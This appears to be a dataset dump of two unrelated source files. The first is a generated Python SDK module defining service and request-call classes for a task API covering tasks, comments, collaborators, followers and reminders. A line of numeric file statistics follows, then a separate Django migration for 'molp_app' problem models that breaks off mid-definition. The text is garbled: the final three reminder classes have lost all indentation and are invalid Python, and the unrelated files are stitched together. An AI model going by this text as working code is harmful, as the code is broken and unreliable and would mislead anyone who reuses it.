        self.task_collaborators = TaskCollaboratorService(self)
        self.task_followers = TaskFollowerService(self)
        self.task_reminders = TaskReminderService(self)


class TaskService(object):
    def __init__(self, service):
        # type: (Service) -> None
        self.service = service

    def complete(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskCompleteReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskCompleteReqCall(self, request_opts=request_opts)

    def create(self, body, tenant_key=None, timeout=None):
        # type: (Task, str, int) -> TaskCreateReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskCreateReqCall(self, body, request_opts=request_opts)

    def delete(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskDeleteReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskDeleteReqCall(self, request_opts=request_opts)

    def get(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskGetReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskGetReqCall(self, request_opts=request_opts)

    def patch(self, body, tenant_key=None, timeout=None):
        # type: (TaskPatchReqBody, str, int) -> TaskPatchReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskPatchReqCall(self, body, request_opts=request_opts)

    def uncomplete(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskUncompleteReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskUncompleteReqCall(self, request_opts=request_opts)


class TaskCommentService(object):
    def __init__(self, service):
        # type: (Service) -> None
        self.service = service

    def create(self, body, tenant_key=None, timeout=None):
        # type: (Comment, str, int) -> TaskCommentCreateReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskCommentCreateReqCall(self, body, request_opts=request_opts)

    def delete(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskCommentDeleteReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskCommentDeleteReqCall(self, request_opts=request_opts)

    def get(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskCommentGetReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskCommentGetReqCall(self, request_opts=request_opts)

    def update(self, body, tenant_key=None, timeout=None):
        # type: (TaskCommentUpdateReqBody, str, int) -> TaskCommentUpdateReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskCommentUpdateReqCall(self, body, request_opts=request_opts)


class TaskCollaboratorService(object):
    def __init__(self, service):
        # type: (Service) -> None
        self.service = service

    def create(self, body, tenant_key=None, timeout=None):
        # type: (Collaborator, str, int) -> TaskCollaboratorCreateReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskCollaboratorCreateReqCall(self, body, request_opts=request_opts)

    def delete(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskCollaboratorDeleteReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskCollaboratorDeleteReqCall(self, request_opts=request_opts)

    def list(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskCollaboratorListReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskCollaboratorListReqCall(self, request_opts=request_opts)


class TaskFollowerService(object):
    def __init__(self, service):
        # type: (Service) -> None
        self.service = service

    def create(self, body, tenant_key=None, timeout=None):
        # type: (Follower, str, int) -> TaskFollowerCreateReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskFollowerCreateReqCall(self, body, request_opts=request_opts)

    def delete(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskFollowerDeleteReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskFollowerDeleteReqCall(self, request_opts=request_opts)

    def list(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskFollowerListReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskFollowerListReqCall(self, request_opts=request_opts)


class TaskReminderService(object):
    def __init__(self, service):
        # type: (Service) -> None
        self.service = service

    def create(self, body, tenant_key=None, timeout=None):
        # type: (Reminder, str, int) -> TaskReminderCreateReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskReminderCreateReqCall(self, body, request_opts=request_opts)

    def delete(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskReminderDeleteReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskReminderDeleteReqCall(self, request_opts=request_opts)

    def list(self, tenant_key=None, timeout=None):
        # type: (str, int) -> TaskReminderListReqCall
        request_opts = []  # type: List[Callable[[Any], Any]]
        if timeout is not None:
            request_opts += [set_timeout(timeout)]
        if tenant_key is not None:
            request_opts += [set_tenant_key(tenant_key)]
        return TaskReminderListReqCall(self, request_opts=request_opts)


class TaskCompleteReqCall(object):
    def __init__(self, service, request_opts=None):
        # type: (TaskService, List[Any]) -> None
        self.service = service
        self.path_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskCompleteReqCall
        self.path_params['task_id'] = task_id
        return self

    def do(self):
        # type: () -> APIResponse[Type[None]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/complete', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
                         None, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskCreateReqCall(object):
    def __init__(self, service, body, request_opts=None):
        # type: (TaskService, Task, List[Any]) -> None
        self.service = service
        self.body = body
        self.query_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_user_id_type(self, user_id_type):
        # type: (str) -> TaskCreateReqCall
        self.query_params['user_id_type'] = user_id_type
        return self

    def do(self):
        # type: () -> APIResponse[Type[TaskCreateResult]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_query_params(self.query_params)]
        req = APIRequest('/open-apis/task/v1/tasks', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
                         self.body, output_class=TaskCreateResult, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskDeleteReqCall(object):
    def __init__(self, service, request_opts=None):
        # type: (TaskService, List[Any]) -> None
        self.service = service
        self.path_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskDeleteReqCall
        self.path_params['task_id'] = task_id
        return self

    def do(self):
        # type: () -> APIResponse[Type[None]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id', 'DELETE', [ACCESS_TOKEN_TYPE_TENANT],
                         None, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskGetReqCall(object):
    def __init__(self, service, request_opts=None):
        # type: (TaskService, List[Any]) -> None
        self.service = service
        self.path_params = {}  # type: Dict[str, Any]
        self.query_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskGetReqCall
        self.path_params['task_id'] = task_id
        return self

    def set_user_id_type(self, user_id_type):
        # type: (str) -> TaskGetReqCall
        self.query_params['user_id_type'] = user_id_type
        return self

    def do(self):
        # type: () -> APIResponse[Type[TaskGetResult]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        self.request_opts += [set_query_params(self.query_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id', 'GET', [ACCESS_TOKEN_TYPE_TENANT],
                         None, output_class=TaskGetResult, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskPatchReqCall(object):
    def __init__(self, service, body, request_opts=None):
        # type: (TaskService, TaskPatchReqBody, List[Any]) -> None
        self.service = service
        self.body = body
        self.path_params = {}  # type: Dict[str, Any]
        self.query_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskPatchReqCall
        self.path_params['task_id'] = task_id
        return self

    def set_user_id_type(self, user_id_type):
        # type: (str) -> TaskPatchReqCall
        self.query_params['user_id_type'] = user_id_type
        return self

    def do(self):
        # type: () -> APIResponse[Type[TaskPatchResult]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        self.request_opts += [set_query_params(self.query_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id', 'PATCH', [ACCESS_TOKEN_TYPE_TENANT],
                         self.body, output_class=TaskPatchResult, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskUncompleteReqCall(object):
    def __init__(self, service, request_opts=None):
        # type: (TaskService, List[Any]) -> None
        self.service = service
        self.path_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskUncompleteReqCall
        self.path_params['task_id'] = task_id
        return self

    def do(self):
        # type: () -> APIResponse[Type[None]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/uncomplete', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
                         None, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskCollaboratorCreateReqCall(object):
    def __init__(self, service, body, request_opts=None):
        # type: (TaskCollaboratorService, Collaborator, List[Any]) -> None
        self.service = service
        self.body = body
        self.path_params = {}  # type: Dict[str, Any]
        self.query_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskCollaboratorCreateReqCall
        self.path_params['task_id'] = task_id
        return self

    def set_user_id_type(self, user_id_type):
        # type: (str) -> TaskCollaboratorCreateReqCall
        self.query_params['user_id_type'] = user_id_type
        return self

    def do(self):
        # type: () -> APIResponse[Type[TaskCollaboratorCreateResult]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        self.request_opts += [set_query_params(self.query_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/collaborators', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
                         self.body, output_class=TaskCollaboratorCreateResult, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskCollaboratorDeleteReqCall(object):
    def __init__(self, service, request_opts=None):
        # type: (TaskCollaboratorService, List[Any]) -> None
        self.service = service
        self.path_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskCollaboratorDeleteReqCall
        self.path_params['task_id'] = task_id
        return self

    def set_collaborator_id(self, collaborator_id):
        # type: (str) -> TaskCollaboratorDeleteReqCall
        self.path_params['collaborator_id'] = collaborator_id
        return self

    def do(self):
        # type: () -> APIResponse[Type[None]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/collaborators/:collaborator_id', 'DELETE', [ACCESS_TOKEN_TYPE_TENANT],
                         None, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskCollaboratorListReqCall(object):
    def __init__(self, service, request_opts=None):
        # type: (TaskCollaboratorService, List[Any]) -> None
        self.service = service
        self.path_params = {}  # type: Dict[str, Any]
        self.query_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskCollaboratorListReqCall
        self.path_params['task_id'] = task_id
        return self

    def set_page_size(self, page_size):
        # type: (int) -> TaskCollaboratorListReqCall
        self.query_params['page_size'] = page_size
        return self

    def set_page_token(self, page_token):
        # type: (str) -> TaskCollaboratorListReqCall
        self.query_params['page_token'] = page_token
        return self

    def set_user_id_type(self, user_id_type):
        # type: (str) -> TaskCollaboratorListReqCall
        self.query_params['user_id_type'] = user_id_type
        return self

    def do(self):
        # type: () -> APIResponse[Type[TaskCollaboratorListResult]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        self.request_opts += [set_query_params(self.query_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/collaborators', 'GET', [ACCESS_TOKEN_TYPE_TENANT],
                         None, output_class=TaskCollaboratorListResult, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskCommentCreateReqCall(object):
    def __init__(self, service, body, request_opts=None):
        # type: (TaskCommentService, Comment, List[Any]) -> None
        self.service = service
        self.body = body
        self.path_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskCommentCreateReqCall
        self.path_params['task_id'] = task_id
        return self

    def do(self):
        # type: () -> APIResponse[Type[TaskCommentCreateResult]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/comments', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
                         self.body, output_class=TaskCommentCreateResult, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskCommentDeleteReqCall(object):
    def __init__(self, service, request_opts=None):
        # type: (TaskCommentService, List[Any]) -> None
        self.service = service
        self.path_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskCommentDeleteReqCall
        self.path_params['task_id'] = task_id
        return self

    def set_comment_id(self, comment_id):
        # type: (int) -> TaskCommentDeleteReqCall
        self.path_params['comment_id'] = comment_id
        return self

    def do(self):
        # type: () -> APIResponse[Type[None]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/comments/:comment_id', 'DELETE', [ACCESS_TOKEN_TYPE_TENANT],
                         None, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskCommentGetReqCall(object):
    def __init__(self, service, request_opts=None):
        # type: (TaskCommentService, List[Any]) -> None
        self.service = service
        self.path_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskCommentGetReqCall
        self.path_params['task_id'] = task_id
        return self

    def set_comment_id(self, comment_id):
        # type: (int) -> TaskCommentGetReqCall
        self.path_params['comment_id'] = comment_id
        return self

    def do(self):
        # type: () -> APIResponse[Type[TaskCommentGetResult]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/comments/:comment_id', 'GET', [ACCESS_TOKEN_TYPE_TENANT],
                         None, output_class=TaskCommentGetResult, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskCommentUpdateReqCall(object):
    def __init__(self, service, body, request_opts=None):
        # type: (TaskCommentService, TaskCommentUpdateReqBody, List[Any]) -> None
        self.service = service
        self.body = body
        self.path_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskCommentUpdateReqCall
        self.path_params['task_id'] = task_id
        return self

    def set_comment_id(self, comment_id):
        # type: (int) -> TaskCommentUpdateReqCall
        self.path_params['comment_id'] = comment_id
        return self

    def do(self):
        # type: () -> APIResponse[Type[TaskCommentUpdateResult]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/comments/:comment_id', 'PUT', [ACCESS_TOKEN_TYPE_TENANT],
                         self.body, output_class=TaskCommentUpdateResult, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskFollowerCreateReqCall(object):
    def __init__(self, service, body, request_opts=None):
        # type: (TaskFollowerService, Follower, List[Any]) -> None
        self.service = service
        self.body = body
        self.path_params = {}  # type: Dict[str, Any]
        self.query_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskFollowerCreateReqCall
        self.path_params['task_id'] = task_id
        return self

    def set_user_id_type(self, user_id_type):
        # type: (str) -> TaskFollowerCreateReqCall
        self.query_params['user_id_type'] = user_id_type
        return self

    def do(self):
        # type: () -> APIResponse[Type[TaskFollowerCreateResult]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        self.request_opts += [set_query_params(self.query_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/followers', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
                         self.body, output_class=TaskFollowerCreateResult, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskFollowerDeleteReqCall(object):
    def __init__(self, service, request_opts=None):
        # type: (TaskFollowerService, List[Any]) -> None
        self.service = service
        self.path_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskFollowerDeleteReqCall
        self.path_params['task_id'] = task_id
        return self

    def set_follower_id(self, follower_id):
        # type: (str) -> TaskFollowerDeleteReqCall
        self.path_params['follower_id'] = follower_id
        return self

    def do(self):
        # type: () -> APIResponse[Type[None]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/followers/:follower_id', 'DELETE', [ACCESS_TOKEN_TYPE_TENANT],
                         None, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp


class TaskFollowerListReqCall(object):
    def __init__(self, service, request_opts=None):
        # type: (TaskFollowerService, List[Any]) -> None
        self.service = service
        self.path_params = {}  # type: Dict[str, Any]
        self.query_params = {}  # type: Dict[str, Any]
        if request_opts:
            self.request_opts = request_opts
        else:
            self.request_opts = []  # type: List[Any]

    def set_task_id(self, task_id):
        # type: (str) -> TaskFollowerListReqCall
        self.path_params['task_id'] = task_id
        return self

    def set_page_size(self, page_size):
        # type: (int) -> TaskFollowerListReqCall
        self.query_params['page_size'] = page_size
        return self

    def set_page_token(self, page_token):
        # type: (str) -> TaskFollowerListReqCall
        self.query_params['page_token'] = page_token
        return self

    def set_user_id_type(self, user_id_type):
        # type: (str) -> TaskFollowerListReqCall
        self.query_params['user_id_type'] = user_id_type
        return self

    def do(self):
        # type: () -> APIResponse[Type[TaskFollowerListResult]]
        root_service = self.service.service
        conf = root_service.conf
        self.request_opts += [set_path_params(self.path_params)]
        self.request_opts += [set_query_params(self.query_params)]
        req = APIRequest('/open-apis/task/v1/tasks/:task_id/followers', 'GET', [ACCESS_TOKEN_TYPE_TENANT],
                         None, output_class=TaskFollowerListResult, request_opts=self.request_opts)
        resp = req.do(conf)
        return resp
class TaskReminderCreateReqCall(object):
def __init__(self, service, body, request_opts=None):
# type: (TaskReminderService, Reminder, List[Any]) -> None
self.service = service
self.body = body
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskReminderCreateReqCall
self.path_params['task_id'] = task_id
return self
def do(self):
# type: () -> APIResponse[Type[TaskReminderCreateResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/reminders', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
self.body, output_class=TaskReminderCreateResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskReminderDeleteReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskReminderService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskReminderDeleteReqCall
self.path_params['task_id'] = task_id
return self
def set_reminder_id(self, reminder_id):
# type: (str) -> TaskReminderDeleteReqCall
self.path_params['reminder_id'] = reminder_id
return self
def do(self):
# type: () -> APIResponse[Type[None]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/reminders/:reminder_id', 'DELETE', [ACCESS_TOKEN_TYPE_TENANT],
None, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskReminderListReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskReminderService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
self.query_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskReminderListReqCall
self.path_params['task_id'] = task_id
return self
def set_page_size(self, page_size):
# type: (int) -> TaskReminderListReqCall
self.query_params['page_size'] = page_size
return self
def set_page_token(self, page_token):
# type: (str) -> TaskReminderListReqCall
self.query_params['page_token'] = page_token
return self
def do(self):
# type: () -> APIResponse[Type[TaskReminderListResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
self.request_opts += [set_query_params(self.query_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/reminders', 'GET', [ACCESS_TOKEN_TYPE_TENANT],
None, output_class=TaskReminderListResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
| 33.599795 | 138 | 0.627715 | 3,798 | 32,827 | 5.167193 | 0.033439 | 0.142369 | 0.072611 | 0.03679 | 0.826344 | 0.818089 | 0.800866 | 0.787618 | 0.772637 | 0.75358 | 0 | 0.000827 | 0.263624 | 32,827 | 976 | 139 | 33.634221 | 0.811029 | 0.179395 | 0 | 0.83612 | 1 | 0 | 0.047441 | 0.031939 | 0 | 0 | 0 | 0 | 0 | 1 | 0.167224 | false | 0 | 0.008361 | 0 | 0.342809 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
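The generated `*ReqCall` classes above all follow the same builder pattern: chainable `set_*` methods fill `path_params`/`query_params`, and `do()` resolves the `:name` segments in the route template before issuing the request. A minimal, self-contained sketch of that pattern (`FollowerListCall` and `build_url` are illustrative stand-ins, not part of the SDK):

```python
import re

class FollowerListCall:
    """Illustrative stand-in for the generated TaskFollowerListReqCall."""

    PATH = '/open-apis/task/v1/tasks/:task_id/followers'

    def __init__(self):
        self.path_params = {}   # filled by the set_* methods, like the SDK
        self.query_params = {}

    def set_task_id(self, task_id):
        self.path_params['task_id'] = task_id
        return self  # returning self is what makes the calls chainable

    def set_page_size(self, page_size):
        self.query_params['page_size'] = page_size
        return self

    def build_url(self):
        # Resolve ':name' route segments from path_params, then append the query.
        path = re.sub(r':(\w+)', lambda m: str(self.path_params[m.group(1)]), self.PATH)
        query = '&'.join(f'{k}={v}' for k, v in sorted(self.query_params.items()))
        return path + ('?' + query if query else '')

url = FollowerListCall().set_task_id('t123').set_page_size(50).build_url()
# url == '/open-apis/task/v1/tasks/t123/followers?page_size=50'
```

The same chaining works for every ReqCall in the file; only the route template and setter names differ.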
3a58d20eb55f7e68d759b8a5492732da4771c383 | 4,664 | py | Python | molp_app/migrations/0001_initial.py | rhombicosi/IDOL | ee8aebd69bef6e90b102ec2be16216a7fda74b9e | [
"MIT"
] | null | null | null | molp_app/migrations/0001_initial.py | rhombicosi/IDOL | ee8aebd69bef6e90b102ec2be16216a7fda74b9e | [
"MIT"
] | null | null | null | molp_app/migrations/0001_initial.py | rhombicosi/IDOL | ee8aebd69bef6e90b102ec2be16216a7fda74b9e | [
"MIT"
] | null | null | null | # Generated by Django 3.1.9 on 2022-02-18 10:30
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Problem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('lp', models.FileField(upload_to='problems/lps/', verbose_name='input file')),
('zips', models.FileField(blank=True, upload_to='problems/zips/', verbose_name='zips')),
('task_id', models.CharField(blank=True, max_length=50, null=True)),
('task_status', models.CharField(blank=True, max_length=50, null=True)),
('maxgap', models.FloatField(choices=[(0, '0%'), (0.1, '10%'), (0.25, '25%')], default=0.1, verbose_name='Max gap')),
('maxtime', models.CharField(choices=[('inf', 'Infinity'), ('30', '30s'), ('60', '1m'), ('300', '5m'), ('600', '10m'), ('1200', '20m'), ('1800', '30m'), ('2400', '40m'), ('3600', '1h')], default='inf', max_length=50, verbose_name='Max time')),
],
),
migrations.CreateModel(
name='UserProblem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('lp', models.FileField(upload_to='problems/lps/', verbose_name='input file')),
('zips', models.FileField(blank=True, upload_to='problems/zips/', verbose_name='zips')),
('task_id', models.CharField(blank=True, max_length=50, null=True)),
('task_status', models.CharField(blank=True, max_length=50, null=True)),
                ('maxgap', models.FloatField(choices=[(0, '0%'), (0.1, '10%'), (0.25, '25%')], default=0.1, verbose_name='Max gap')),
('maxtime', models.CharField(choices=[('inf', 'Infinity'), ('30', '30s'), ('60', '1m'), ('300', '5m'), ('600', '10m'), ('1200', '20m'), ('1800', '30m'), ('2400', '40m'), ('3600', '1h')], default='inf', max_length=50, verbose_name='Max time')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='problems', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='UserProblemParameters',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('weights', models.FileField(blank=True, upload_to='problems/parameters/weights/')),
('reference', models.FileField(blank=True, upload_to='problems/parameters/reference/', verbose_name='Y')),
('problem', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='parameters', to='molp_app.userproblem')),
],
),
migrations.CreateModel(
name='UserProblemChebyshev',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('chebyshev', models.FileField(blank=True, upload_to='problems/chebyshev/')),
('problem', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='chebyshev', to='molp_app.userproblem')),
],
),
migrations.CreateModel(
name='ProblemParameters',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('weights', models.FileField(blank=True, upload_to='problems/parameters/weights/')),
('reference', models.FileField(blank=True, upload_to='problems/parameters/reference/', verbose_name='Y')),
('problem', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='parameters', to='molp_app.problem')),
],
),
migrations.CreateModel(
name='ProblemChebyshev',
fields=[
